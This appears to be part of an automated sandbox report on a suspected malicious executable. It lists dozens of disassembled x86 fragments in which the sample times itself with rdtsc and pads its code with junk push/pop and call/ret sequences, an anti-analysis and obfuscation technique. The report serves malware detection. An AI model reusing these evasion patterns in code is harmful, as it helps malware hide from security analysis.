                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 891AB5 second address: 891ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892AE0 second address: 892AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892AE6 second address: 892AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892AEB second address: 892B56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F7F1CE19AA8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 and bx, 1A73h 0x00000029 push 00000000h 0x0000002b mov bh, 3Fh 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007F7F1CE19AA8h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 clc 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d ja 00007F7F1CE19AACh 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 893B0D second address: 893B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892D27 second address: 892D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894CD0 second address: 894CDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894CDF second address: 894CF0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895CBF second address: 895D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F7F1D21A768h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D338Fh] 0x0000002b push 00000000h 0x0000002d mov edi, dword ptr [ebp+122D32CAh] 0x00000033 push 00000000h 0x00000035 jl 00007F7F1D21A76Ch 0x0000003b mov edi, dword ptr [ebp+122D383Dh] 0x00000041 xchg eax, esi 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 jo 00007F7F1D21A766h 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895D0E second address: 895D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895D12 second address: 895D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F1D21A777h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jmp 00007F7F1D21A775h 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894F1E second address: 894F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 896C62 second address: 896C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 893DA5 second address: 893DB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 893DB2 second address: 893DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897E17 second address: 897E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1CE19AABh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897F57 second address: 897F5D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898DD0 second address: 898DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89AC4B second address: 89AC4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898EB0 second address: 898EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C29B second address: 89C29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89D899 second address: 89D89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89D89D second address: 89D8BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A76Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jnl 00007F7F1D21A76Ch 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89CA82 second address: 89CA87 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89DA68 second address: 89DAAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A774h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7F1D21A773h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F7F1D21A777h 0x00000018 jmp 00007F7F1D21A771h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A786E second address: 8A7874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A6FCE second address: 8A6FED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007F7F1D21A766h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F7F1D21A76Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A73F9 second address: 8A73FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB718 second address: 8AB71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB85A second address: 8AB8B2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F1CE19AB4h 0x0000000b popad 0x0000000c push eax 0x0000000d ja 00007F7F1CE19ACFh 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a ja 00007F7F1CE19AA6h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB8B2 second address: 8AB8C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F1D21A76Eh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB8C8 second address: 8AB8CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB8CC second address: 8AB915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jnp 00007F7F1D21A77Ch 0x00000010 jmp 00007F7F1D21A776h 0x00000015 pushad 0x00000016 jmp 00007F7F1D21A775h 0x0000001b push edi 0x0000001c pop edi 0x0000001d popad 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push edi 0x00000024 push eax 0x00000025 push edx 0x00000026 push edx 0x00000027 pop edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB9CF second address: 8AB9D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1F70 second address: 8B1F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1F74 second address: 8B1F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007F7F1CE19AADh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1F8C second address: 8B1F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B2471 second address: 8B2484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F7F1CE19AB2h 0x0000000b jc 00007F7F1CE19AACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6DC2 second address: 8B6DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6DC6 second address: 8B6DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B74A2 second address: 8B74A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7766 second address: 8B776D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7DAF second address: 8B7DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1D21A76Eh 0x00000009 popad 0x0000000a jmp 00007F7F1D21A773h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7DDA second address: 8B7DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7DDE second address: 8B7E05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7F1D21A779h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F7F1D21A766h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BB703 second address: 8BB709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BB709 second address: 8BB712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BB712 second address: 8BB71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BB71E second address: 8BB722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF7A8 second address: 8BF7AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF7AE second address: 8BF7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87F6EA second address: 87F6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87F7F3 second address: 87F7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87F7FF second address: 87F80A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7F1CE19AA6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87F80A second address: 87F80F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FBA8 second address: 87FBAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FBAD second address: 87FBB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FD4F second address: 87FD54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FD54 second address: 87FD5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FD5A second address: 87FD99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 0727D3B3h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F7F1CE19AA8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 push 748BE90Fh 0x0000002e push esi 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FE49 second address: 87FE4F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FE4F second address: 87FE7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F7F1CE19AACh 0x00000012 je 00007F7F1CE19AA6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FE7A second address: 87FEBA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F1D21A768h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d add edx, dword ptr [ebp+122D3825h] 0x00000013 nop 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007F7F1D21A771h 0x0000001b jmp 00007F7F1D21A775h 0x00000020 popad 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FEBA second address: 87FEC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FEC6 second address: 87FECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8801CC second address: 8801D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8806AC second address: 8806BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFEED second address: 8BFEF7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7F1CE19AA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFEF7 second address: 8BFF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFF03 second address: 8BFF07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C0036 second address: 8C004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7F1D21A771h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C004E second address: 8C005E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F1CE19AA6h 0x00000008 js 00007F7F1CE19AA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C005E second address: 8C006A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F7F1D21A766h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C006A second address: 8C006E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C0341 second address: 8C034C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnp 00007F7F1D21A766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C04C3 second address: 8C04C9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C443F second address: 8C4443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4443 second address: 8C4458 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F1CE19AA6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d ja 00007F7F1CE19AA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8B6D second address: 8C8B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9038 second address: 8C903C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C903C second address: 8C9040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C91EB second address: 8C9206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9206 second address: 8C920A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C920A second address: 8C9210 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9210 second address: 8C922F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1D21A779h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C94DA second address: 8C94E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C94E0 second address: 8C94FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F7F1D21A775h 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CCD3A second address: 8CCD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CCD3E second address: 8CCD42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8487A3 second address: 8487BA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7F1CE19AABh 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CC8C3 second address: 8CC8C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CC8C7 second address: 8CC8CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CC8CD second address: 8CC8E2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F1D21A76Eh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF1C8 second address: 8CF1D6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CED72 second address: 8CED79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CED79 second address: 8CED8A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F7F1CE19AAEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D363D second address: 8D365A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A779h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
